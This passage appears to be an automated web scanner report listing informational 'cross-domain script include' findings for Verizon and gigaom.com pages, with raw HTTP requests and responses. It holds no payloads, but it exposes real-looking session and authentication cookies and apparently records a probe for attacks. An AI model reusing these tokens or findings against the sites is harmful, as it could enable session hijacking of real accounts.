http://r.turn.com/server/beacon_call.js?b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g
http://segment-pixel.invitemedia.com/pixel?pixelID=14055&partnerID=134&clientID=2540&key=segment&returnType=js

Request

GET /tags/1234568496.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential

Response

HTTP/1.0 200 OK
x-amz-id-2: B0nY08H2jpnHjn/SW41fxJTVypUCPMOogChBFehqE69xiZnUUjh9mvHcrg7qazQh
x-amz-request-id: 370753916E2BAB25
Date: Sat, 20 Aug 2011 03:01:56 GMT
x-amz-meta-s3fox-filesize: 2507
x-amz-meta-s3fox-modifiedtime: 1311270024611
Last-Modified: Thu, 21 Jul 2011 17:40:29 GMT
ETag: "6fc159b6442ca664eb0709a8e343aad7"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2507
Server: AmazonS3
Age: 45636
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 21cfe9b1f85d28e01ed1d4ecf31011793c8e7dc0d4825f268d693e21748867c3c4fee5590cf14602
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>



<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=14055&partnerID=134&clientID=2540&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g">
</script>
...[SNIP]...
<img src="http://ad.yieldmanager.com/pixel?id=1195985&id=1195982&id=103815&t=2" width="1" height="1" />

<script type="text/javascript" src="http://cti.w55c.net/ct/ct-798466b25b8841b28752394c7d7a01b8.js"></script>
...[SNIP]...

16.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234571455.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3=
http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ
http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js

Request

GET /tags/1234571455.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: 383mtG+vKWCru1G6cHTPDq3okRLkcpaSCR4eB7nPE2OOt4eTsLyWbJYJsNhbyKrw
x-amz-request-id: 820B35F0E6EBA1BE
Date: Fri, 26 Aug 2011 18:21:13 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142890848
Last-Modified: Wed, 24 Aug 2011 20:01:20 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 10813
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6155803d16c8482abd205043b94b6a9de183a9c9a7596054019bb1d544e25453d8c6d93c77949fa1
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>



<html>
<head>
</head>
<body>




<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ">
</script>
...[SNIP]...


<script language='JavaScript1.1' src='http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3='></script>
...[SNIP]...

16.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234571456.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3=
http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ
http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js

Request

GET /tags/1234571456.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: q9iYskpUNHXsfpxrxzNmGO1ZhlcEQ3sbjXF3FbNwhAoje/2YkDdJoGlHBNDNddhi
x-amz-request-id: 521DCA4F7060D914
Date: Thu, 25 Aug 2011 16:40:37 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142878346
Last-Modified: Wed, 24 Aug 2011 20:01:21 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 64838
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: c323e91c050b5c25a364eeb8082932bb5d3c060736379d747d4b7b8d8aea09acd436aa5976863e0b
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 6788ca0114a0c4ef3becec756fad24c9.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>



<html>
<head>
</head>
<body>




<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ">
</script>
...[SNIP]...


<script language='JavaScript1.1' src='http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3='></script>
...[SNIP]...

16.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/totaltagdefault.html

Issue detail

The response dynamically includes the following script from another domain:

http://segment-pixel.invitemedia.com/pixel?pixelID=29265&partnerID=134&clientID=2540&key=segment&returnType=js

Request

GET /tags/totaltagdefault.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: rZPoYQaUGLQ6sKLppFSf79qH3elcMVZfCjuimsJIWwl3Dhw9+pjq1ESBDE8xfdiw
x-amz-request-id: B03BB6A02002DEF8
Date: Fri, 05 Nov 2010 03:32:36 GMT
x-amz-meta-s3fox-filesize: 450
x-amz-meta-s3fox-modifiedtime: 1288200776090
Last-Modified: Wed, 27 Oct 2010 17:34:50 GMT
ETag: "0fc31b6da653526a0d1e7edd0df50c5e"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 450
Server: AmazonS3
Age: 32621
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: ca02ba0e614f8a3041933a50777f096145af8cca3e15cdc5b84b7f316a4350075781b2aefd6cde6f
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=29265&partnerID=134&clientID=2540&key=segment&returnType=js"></script>
...[SNIP]...

16.7. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js

Request

Response

16.8. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js

Request

Response

16.9. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.verizon.com
Path:	/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

The response dynamically includes the following scripts from other domains:

http://vrzn.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vrzn.i.lithium.com/t5/scripts/2D764F5A9BF264057B8A15FAD89E912C/lia-scripts-body-min.js
http://vrzn.i.lithium.com/t5/scripts/EF6FE0F0F602A4D3CED80971609027D6/lia-scripts-common-min.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 194018
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>


       <script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/EF6FE0F0F602A4D3CED80971609027D6/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/2D764F5A9BF264057B8A15FAD89E912C/lia-scripts-body-min.js"></script>
...[SNIP]...

16.10. http://gigaom.com/cloud/structure-50/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gigaom.com
Path:	/cloud/structure-50/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/anywhere.js?id=0Yu0nIBvT6g1xRqJGXRA&v=1&ver=1
http://player.ooyala.com/player.js?width=393&height=220&embedCode=51eGJvMjqFMr1Skkr_zUlPhBeyFjvGH6&view=channel&wmode=opaque
http://s.gravatar.com/js/gprofiles.js?y&ver=MU
http://s.stats.wordpress.com/w.js?20
http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308975713g&ver=1.6.1
http://s0.wp.com/wp-includes/js/jquery/ui.button.js?m=1308975713g&ver=1.8.12
http://s0.wp.com/wp-includes/js/jquery/ui.core.js?m=1308975713g&ver=1.8.12
http://s0.wp.com/wp-includes/js/jquery/ui.dialog.js?m=1308975713g&ver=1.8.12
http://s0.wp.com/wp-includes/js/jquery/ui.draggable.js?m=1308975713g&ver=1.8.12
http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367673g&ver=MU
http://s1.wp.com/wp-content/themes/vip/gigaom/components/js/waypoints.min.js?m=1311203325g&ver=1
http://s1.wp.com/wp-content/themes/vip/gigaom/js/fancybox/jquery.fancybox-1.3.0.pack.js?m=1308975759g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cookie.js?m=1308975759g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cycle.min.js?m=1308975759g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.template.js?m=1309189091g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/jquery.videoLightbox.js?m=1308975759g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/ooyala.js?m=1308975759g&ver=6
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-cse/js/go-cse.js?m=1314910166g&ver=MU
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-post-pager/js/go-post-pager.js?m=1308975761g&ver=MU
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/identity.js?m=1312474709g&ver=2
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.example.min.js?m=1310506872g&ver=1
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.tools.min.js?m=1310506872g&ver=2
http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/widgets/go-qwest/js/script.js?m=1308975761g&ver=1
http://s1.wp.com/wp-includes/js/comment-reply.js?m=1308975714g&ver=20090102
http://s1.wp.com/wp-includes/js/jquery/ui.mouse.js?m=1308975713g&ver=1.8.12
http://s1.wp.com/wp-includes/js/jquery/ui.position.js?m=1308975713g&ver=1.8.12
http://s1.wp.com/wp-includes/js/jquery/ui.tabs.js?m=1308975713g&ver=1.8.12
http://s2.wp.com/wp-includes/js/jquery/ui.resizable.js?m=1308975713g&ver=1.8.12
http://s2.wp.com/wp-includes/js/jquery/ui.widget.js?m=1308975713g&ver=1.8.12
http://siterecruit.comscore.com/sr/gigaom/broker.js
http://wordpress.com/remote-login.php?action=js&host=gigaom.com&id=14960843&t=1315262127&back=gigaom.com%2Fcloud%2Fstructure-50%2F
http://www.google.com/jsapi?ver=MU
http://www.statcounter.com/counter/counter_xhtml.js
https://apis.google.com/js/plusone.js

Request

GET /cloud/structure-50/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:35:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 05 Sep 2011 22:35:27 +0000
Cache-Control: max-age=299, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Link: <http://wp.me/p10LZV-1rLZ>; rel=shortlink
X-nananana: Batcache
Content-Length: 221328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script>
       <script src='http://wordpress.com/remote-login.php?action=js&host=gigaom.com&id=14960843&t=1315262127&back=gigaom.com%2Fcloud%2Fstructure-50%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='videoLightbox-css' href='http://s1.wp.com/wp-content/themes/vip/gigaom/css/videoLightbox.css?m=1308975764g&ver=6' type='text/css' media='screen' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308975713g&ver=1.6.1'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.core.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/jquery/ui.widget.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.tabs.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.mouse.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/jquery/ui.resizable.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.draggable.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.button.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.position.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.dialog.js?m=1308975713g&ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/identity.js?m=1312474709g&ver=2'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.example.min.js?m=1310506872g&ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.tools.min.js?m=1310506872g&ver=2'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=0Yu0nIBvT6g1xRqJGXRA&v=1&ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/widgets/go-qwest/js/script.js?m=1308975761g&ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/components/js/waypoints.min.js?m=1311203325g&ver=1'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-cse/js/go-cse.js?m=1314910166g&ver=MU'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/comment-reply.js?m=1308975714g&ver=20090102'></script>
...[SNIP]...
<meta name="msapplication-task" content="name=Subscribe;action-uri=http://feeds.feedburner.com/structureblog;icon-uri=http://1.gravatar.com/blavatar/f8748081423ce49bd3ecb267cd4effc7?s=16" />
           <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
           </script>
...[SNIP]...
<div class="video-player ooyala-video">        <script src="http://player.ooyala.com/player.js?width=393&height=220&embedCode=51eGJvMjqFMr1Skkr_zUlPhBeyFjvGH6&view=channel&wmode=opaque"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script async='true' type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

<script async='true' src="http://siterecruit.comscore.com/sr/gigaom/broker.js"></script><script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-post-pager/js/go-post-pager.js?m=1308975761g&ver=MU'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cycle.min.js?m=1308975759g&ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/jquery.videoLightbox.js?m=1308975759g&ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/ooyala.js?m=1308975759g&ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/fancybox/jquery.fancybox-1.3.0.pack.js?m=1308975759g&ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.template.js?m=1309189091g&ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cookie.js?m=1308975759g&ver=6'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="https://apis.google.com/js/plusone.js">
       {"parsetags" : "explicit"}
   </script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?y&ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367673g&ver=MU'></script>
...[SNIP]...
</script>
<script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

16.11. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.verizonwireless.com
Path:	/amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/scripts/accessible/button.js
http://cache.vzw.com/scripts/accessible/popup.js
http://cache.vzw.com/scripts/accessible/udm-control.js
http://cache.vzw.com/scripts/accessible/udm-custom.js

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Identity Provider ID is null.
Server: VZW
Date: Mon, 05 Sep 2011 22:35:06 GMT
Connection: close
Cache-control: no-cache
Pragma: no-cache
Set-cookie: JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver
Content-type: text/html
Content-length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>

...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />

       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/udm-custom.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/udm-control.js"></script>
       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/popup.js"></script>
       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/button.js"></script>
...[SNIP]...

16.12. https://mblogin.verizonwireless.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mblogin.verizonwireless.com
Path:	/amserver/UI/Login

Issue detail

The response dynamically includes the following scripts from other domains:

https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js
https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js
https://scache.vzw.com/mybiz/core/scripts/lib.js
https://scache.vzw.com/mybiz/core/scripts/mootools.js
https://scache.vzw.com/mybiz/core/scripts/pngfix.js
https://scache.vzw.com/mybiz/selfservice/scripts/ajaxOverlay.js
https://scache.vzw.com/mybiz/selfservice/scripts/script.js

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:31 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-11
Am_client_type: genericHTML
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close
Content-Length: 18685

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/j
...[SNIP]...
<link href="https://scache.vzw.com/mybiz/core/styles/layout.css" rel="stylesheet" type="text/css" />
       <script src="https://scache.vzw.com/mybiz/selfservice/scripts/script.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/mootools.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/lib.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/pngfix.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/selfservice/scripts/ajaxOverlay.js"></script>
...[SNIP]...

16.13. http://newscenter.verizon.com/404.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/404.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://vznews.convio.net/js/convio/modules.js
http://vznews.convio.net/js/utils.js
http://vznews.convio.net/yui3/yui/yui-min.js
http://www.google-analytics.com/urchin.js
https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508

Request

GET /404.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; 